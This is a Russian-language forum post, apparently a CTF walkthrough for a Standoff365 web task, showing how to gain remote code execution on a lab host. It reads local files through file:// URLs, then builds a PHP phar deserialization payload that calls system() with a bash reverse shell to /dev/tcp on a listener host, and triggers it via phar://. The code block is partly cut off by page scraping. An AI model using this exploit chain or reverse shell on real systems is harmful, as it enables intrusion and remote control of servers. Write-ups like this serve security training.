HOME FORUMS MEMBERS RECENT POSTS LOG IN  
× Авторизация
Имя пользователя:
Пароль:
Нет аккаунта? Регистрация
Баннер 1   Баннер 2
НОВЫЕ ТОРГОВАЯ НОВОСТИ ЧАТ
loading...
Скрыть
Вернуться   ANTICHAT > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Этичный хакинг или пентестинг > Задания/Квесты/CTF/Конкурсы
Перезагрузить страницу [web-8] Удаленное выполнение кода (RCE) на узле gallery.edu.stf (standoff365)
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 13.03.2026, 06:39
d1lya
Новичок
Регистрация: 16.02.2026
Сообщений: 2
С нами: 128294

Репутация: 0
По умолчанию
Описание
Получите RCE на узле gallery.edu.stf (10.124.1.236).
Для получения флага выполните скрипт /home/rceflag.

Тестируем сайт, пробуем загрузить картинки и смотрим поведение.

Пытаемся загрузить вместо урла картинки
Код:
file:///etc/passwd


Сразу отправляем запрос в burp в repeater для удобства, он нам понадобится еще ни раз.



Переходим посмотреть что там за txt пришел в ответе.



Пол успеха в кармане. Теперь пробуем найти файлы из первой подсказки ./classes.php, ./ajax.php.
Перебираем варианты, сработал
Код:
file:///var/www/html/classes.php
.
По новой полученной ссылки в ответе видим classes.php



Проблема в строке usort($ImageArr, $SortFunc). В PHP второй параметр функции usort это имя функции, значит при большом желании мы можем вставить туда функцию system(), которая выполнит команду Linux.

Подсказка гласит:
Цитата:

создать phar-архив с объектом, который модифицирует переменные таким образом, чтобы они вызвали выполнение произвольного кода при десериализации.

Я поняла это так: когда PHP открывает файл через
Код:
phar://
он автоматически делает unserialize и нам нужно создать объект ImageSorting, где SortFunc будет "system". Тогда при уничтожении объекта выполнится
Код:
usort(..., "system")
. А вместо ImageArr попробуем запустить интерактивный shell

Код:


Код:
public $ImageArr = array("bash -c 'bash -i >& /dev/tcp/10.127.192.45/4444 0>&1'", "" , "");
Вместо 10.127.192.45 пишите свой IP (и порт, если будете использовать не 4444 для nc). IP можно найти по
Код:
ip a
.

У себя создаем файл php, например phar.php.

PHP:


Код:
& /dev/tcp/10.127.192.45/4444 0>&1'", ""];
    public $SortFunc = "system";
}

$phar = new Phar('payload.phar');
$phar->startBuffering();
$phar->addFromString('empty.txt', '');
$phar->setStub('');
$phar->setMetadata(new ImageSorting());
$phar->stopBuffering();
?>
Запускаем сборку phar файла

Код:
php -d phar.readonly=0 phar.php
Появился файл payload.phar.
Открываем порт 4444 (или другой вам удобный) и слушаем его
Код:
nc -lvnp 4444
(с папки где лежит payload.phar).

Готовый файл phar загружаем на сайт через форму загрузки.



Берем ответ и формируем из него запрос
Код:
phar:///var/www/html/images/....txt


Смотрим реакцию листенера - открылся шелл.



Долгожданный запуск
Код:
./home/rceflag
и получение флага.

𝕏 Twitter Reddit Telegram Копировать ссылку
 
Ответить с цитированием
Ответ



« Предыдущая тема | Следующая тема »


Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT ™ © 2001- Antichat Kft.